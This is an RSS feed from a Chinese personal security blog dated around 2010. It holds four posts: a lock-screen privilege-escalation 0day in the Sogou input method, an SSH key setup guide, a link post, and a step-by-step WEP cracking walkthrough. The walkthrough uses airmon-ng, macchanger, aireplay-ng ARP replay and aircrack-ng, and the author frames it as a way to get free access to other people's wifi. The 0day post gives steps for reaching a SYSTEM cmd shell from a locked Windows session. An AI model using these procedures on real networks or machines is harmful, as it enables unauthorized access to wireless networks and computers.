<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Kane&#039;s Blog &#187; Security</title>
	<atom:link href="http://iamkane.com/index.php/archives/category/security/feed" rel="self" type="application/rss+xml" />
	<link>http://iamkane.com</link>
	<description>Bug can be anywhere,Can you find it?</description>
	<lastBuildDate>Mon, 21 Jun 2010 11:05:40 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>【原创】0day 搜狗输入法漏洞获取系统权限。</title>
		<link>http://iamkane.com/index.php/archives/58</link>
		<comments>http://iamkane.com/index.php/archives/58#comments</comments>
		<pubDate>Sat, 09 Jan 2010 07:05:12 +0000</pubDate>
		<dc:creator>Kane</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://iamkane.com/?p=58</guid>
		<description><![CDATA[无意发现了一个很严重的漏洞，和当年3389 输入法漏洞相似。 不过暂时不影响未系统未加载搜狗输入法（未登录系统）。如果远程服务器装了 搜狗，登录系统后加载了搜狗，而又未及时注销或kill掉搜狗输入法直接关闭了远程连接，那么这些server 就很危险咯。
&#160;
测试环境：
OS: windows 7 ultimate
搜狗输入法 4.3 正式版
&#160;
漏洞过程描述：
当windows加载了搜狗输入法后（登录系统后），锁定计算机(cltr+alt+del)。切换为搜狗输入法，输入拼音字母出现搜狗输入法工具条后，点击搜索，会调用 iexplorer.exe 。接下来就可以直接在IE地址栏调用system32目录并运行cmd，如果登录账号为administrators 组。则直接获取本机系统权限。
&#160;
&#160;
]]></description>
			<content:encoded><![CDATA[<p>无意发现了一个很严重的漏洞，和当年3389 输入法漏洞相似。 不过暂时不影响未系统未加载搜狗输入法（未登录系统）。如果远程服务器装了 搜狗，登录系统后加载了搜狗，而又未及时注销或kill掉搜狗输入法直接关闭了远程连接，那么这些server 就很危险咯。</p>
<p>&nbsp;</p>
<p>测试环境：</p>
<p>OS: windows 7 ultimate</p>
<p>搜狗输入法 4.3 正式版</p>
<p>&nbsp;</p>
<p>漏洞过程描述：</p>
<p>当windows加载了搜狗输入法后（登录系统后），锁定计算机(cltr+alt+del)。切换为搜狗输入法，输入拼音字母出现搜狗输入法工具条后，点击搜索，会调用 iexplorer.exe 。接下来就可以直接在IE地址栏调用system32目录并运行cmd，如果登录账号为administrators 组。则直接获取本机系统权限。</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://iamkane.com/index.php/archives/58/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>SSH Secure Shell 使用密钥的方法</title>
		<link>http://iamkane.com/index.php/archives/57</link>
		<comments>http://iamkane.com/index.php/archives/57#comments</comments>
		<pubDate>Thu, 07 Jan 2010 02:47:21 +0000</pubDate>
		<dc:creator>Kane</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://iamkane.com/?p=57</guid>
		<description><![CDATA[1. 先在global  setting的认证 Key 里面创建自己的key
2. 登陆之后，上传key。 其中要将第二项要修改为 .ssh 。
3. 接着要做一些手工的操作，在命令行界面里，输入如下命令： (左脚注意前面的$符号不是命令，只是个提示符)
$ cd .ssh/
$ ls -l
会至少看到你刚才生成的 .pub 公钥文件和一个 authorization 认证配置文件。如果没有你刚才起的名子的文件，那就有问题，检查上面的过程。
接着做下面的命令，假设我生成的是 key.pub
$ ssh-keygen -i -f&#160;&#160; key.pub &#62;&#62; authorized_keys
然后，删除刚才生成的文件：
$ rm -rf&#160;&#160;&#160; key.pub
$ rm -rf&#160;&#160;  authorization
&#160;
基本完成，剩下就是重新创建一个连接，使用pubkey 的方式。
]]></description>
			<content:encoded><![CDATA[<p>1. 先在global  setting的认证 Key 里面创建自己的key</p>
<p>2. 登陆之后，上传key。 其中要将第二项要修改为 .ssh 。</p>
<p>3. 接着要做一些手工的操作，在命令行界面里，输入如下命令： (左脚注意前面的$符号不是命令，只是个提示符)</p>
<p>$ cd .ssh/<br />
$ ls -l<br />
会至少看到你刚才生成的 .pub 公钥文件和一个 authorization 认证配置文件。如果没有你刚才起的名子的文件，那就有问题，检查上面的过程。</p>
<p>接着做下面的命令，假设我生成的是 key.pub</p>
<p>$ ssh-keygen -i -f&nbsp;&nbsp; key.pub &gt;&gt; authorized_keys</p>
<p>然后，删除刚才生成的文件：</p>
<p>$ rm -rf&nbsp;&nbsp;&nbsp; key.pub<br />
$ rm -rf&nbsp;&nbsp;  authorization</p>
<p>&nbsp;</p>
<p>基本完成，剩下就是重新创建一个连接，使用pubkey 的方式。</p>
]]></content:encoded>
			<wfw:commentRss>http://iamkane.com/index.php/archives/57/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux 常用的命令</title>
		<link>http://iamkane.com/index.php/archives/8</link>
		<comments>http://iamkane.com/index.php/archives/8#comments</comments>
		<pubDate>Sun, 12 Apr 2009 17:34:55 +0000</pubDate>
		<dc:creator>Kane</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://iamkane.com/?p=8</guid>
		<description><![CDATA[Linux  Unix常用的命令
 http://www.iamkane.com/linux.html
]]></description>
			<content:encoded><![CDATA[<p>Linux  Unix常用的命令<br />
<a target="_blank" href="http://www.iamkane.com/linux.html"> http://www.iamkane.com/linux.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://iamkane.com/index.php/archives/8/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[原创]用BT3破解WIFI WEP加密</title>
		<link>http://iamkane.com/index.php/archives/11</link>
		<comments>http://iamkane.com/index.php/archives/11#comments</comments>
		<pubDate>Sun, 12 Apr 2009 15:24:35 +0000</pubDate>
		<dc:creator>Kane</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://iamkane.com/?p=11</guid>
		<description><![CDATA[下了个BT3(Back Track 3)，上YouTube看了段破解WEP的视频。自己实现了一下，结果真的行了。wifi的WEP 加密真的很脆弱，不过以后看见wifi基本就可以上网囖。哈哈。
一、试验环境
1.需要一张支持在linux使用airodump ，aircrack 的无线网卡。网上很多资料，自己去找吧。
2.下载BT3 ISO 刻盘，然后从光盘启动进入 KDE BT 里面。
二、过程步骤：
1.在菜单栏的Internet 中找到 wireless assistant 并打开。里面可以看到附近的无线网络。看看有没有加密了网络。这里我只测试了WEP的加密。如果提示无找到网络，会自动关闭。需要从新检查一下你的无线网卡。
2. 接下来是开第一shell 开始输入命令啦：
     1）输入 airmon-ng  返回 无线网卡列表，要看清楚哪张网卡哦！我这里是wifi0
     2）airmon-ng stop wifi0
     3)  ifconfig wif0 down
     4）macchanger -m 00:11:22:33:44:55 wifi0    修改网卡的mac地址
  [...]]]></description>
			<content:encoded><![CDATA[<p>下了个BT3(Back Track 3)，上YouTube看了段破解WEP的视频。自己实现了一下，结果真的行了。wifi的WEP 加密真的很脆弱，不过以后看见wifi基本就可以上网囖。哈哈。</p>
<p>一、试验环境</p>
<p>1.需要一张支持在linux使用airodump ，aircrack 的无线网卡。网上很多资料，自己去找吧。</p>
<p>2.下载BT3 ISO 刻盘，然后从光盘启动进入 KDE BT 里面。</p>
<p>二、过程步骤：</p>
<p>1.在菜单栏的Internet 中找到 wireless assistant 并打开。里面可以看到附近的无线网络。看看有没有加密了网络。这里我只测试了WEP的加密。如果提示无找到网络，会自动关闭。需要从新检查一下你的无线网卡。</p>
<p>2. 接下来是开第一shell 开始输入命令啦：</p>
<p>     1）输入 airmon-ng  返回 无线网卡列表，要看清楚哪张网卡哦！我这里是wifi0</p>
<p>     2）airmon-ng stop wifi0</p>
<p>     3)  ifconfig wif0 down</p>
<p>     4）macchanger -m 00:11:22:33:44:55 wifi0    修改网卡的mac地址</p>
<p>     5）airmon-ng start wifi0   启动完成后会再次列出所有的无线网卡。有写网卡会提示继承父级的驱动。估计这里的意思是，BT3自带了破解的驱动吧。呵呵..</p>
<p>     6）设置网卡ko了，就开始airodump啦！</p>
<p>         输入  airodump-ng wifi0  ，成功后会出现一个列表，而且不断的有pack进出。如果无返回这个列表，就需要改一下，看看刚才上面arimon-ng列出来的网卡。然后换一个网卡来 dump。我这里是 airodump-ng ath1. 列表如果出来，就按 ctrl+C 停止。然后找到你要破解的网络的BSSID并且copy下来,还有要看清楚他的channel 和essid.</p>
<p>    7) airodump-ng -c 要破解的channel  -w wep123 &#8211;bssid 粘贴刚刚的BSSID</p>
<p>        这里的wep123是随便输入的，后面需要用的哦。</p>
<p>3. 再开一个Shell输入：</p>
<p>   1） aireplay-ng -1 -0 -a 粘贴刚刚的BSSID  -h 00:11:22:33:44:55 -e 要破解的essid ath1</p>
<p>    回车后，会返回一段东西里面有success的字样。具体是什么没太留意啦。就直接下一步了。也不知道失败是返回什么了。</p>
<p>  2） airepaly-ng -3 -b 粘贴刚刚的BSSID   -h 00:11:22:33:44:55 ath1</p>
<p>   这里就直接arp了整个wifi网络。在wifi里面的人估计就上不了网了。所以接下来要速度点。如果里面的没人..那我就不知道会怎么样了。哈哈.因为需要截取一定量的数据包才能破解出密码。</p>
<p>4. 再开一个shell输入：</p>
<p>   aircrack-ng -n 64 0b 粘贴刚刚的BSSID   wep123_01.cap</p>
<p>   这里不要这么快按回车，有两个地方需要注意的。第一是wep123_01.cap，需要确认一下名称，去home目录看看是不是这个名字。第二看看第一个shell窗口的数据包是否过W。如果都ko了，就按回车看结果吧。</p>
<p>key found: 后面这些就是密码啦。</p>
<p>三. 总结一下</p>
<p>        WEP真的非常脆弱，但相信国内大多数wifi用的都是WEP啦。特别是家庭里面用的。下次要实现一下WPA 和 WPA-PSK 这两个环境的破解。BT3 是国外一个非常牛B的crack OS，里面集成大量的 hack tools。当出差或者去旅行的时候，最好带上一个网卡和BT3光盘。一定会有所收获的。呵呵..</p>
<p>       另外，前段时间在武汉机场深圳机场都看到有中国电信的wifi网络。中国电信wifi是相对安全的。他不是加密的wifi。而是先让你连进wifi分配了一个公网IP给你。但是当你的数据要出去的时候，他会redirected到一个登陆页面输入帐户密码。所以&#8230;. 别想无线城的wifi了。不过估计奥运有外国hacker 想到办法破解到电信这个wifi系统的啦。</p>
<p>加个IPW2200的方法：http://backtrack.offensive-security.com/index.php/HCL:Wireless#IPW2200</p>
]]></content:encoded>
			<wfw:commentRss>http://iamkane.com/index.php/archives/11/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
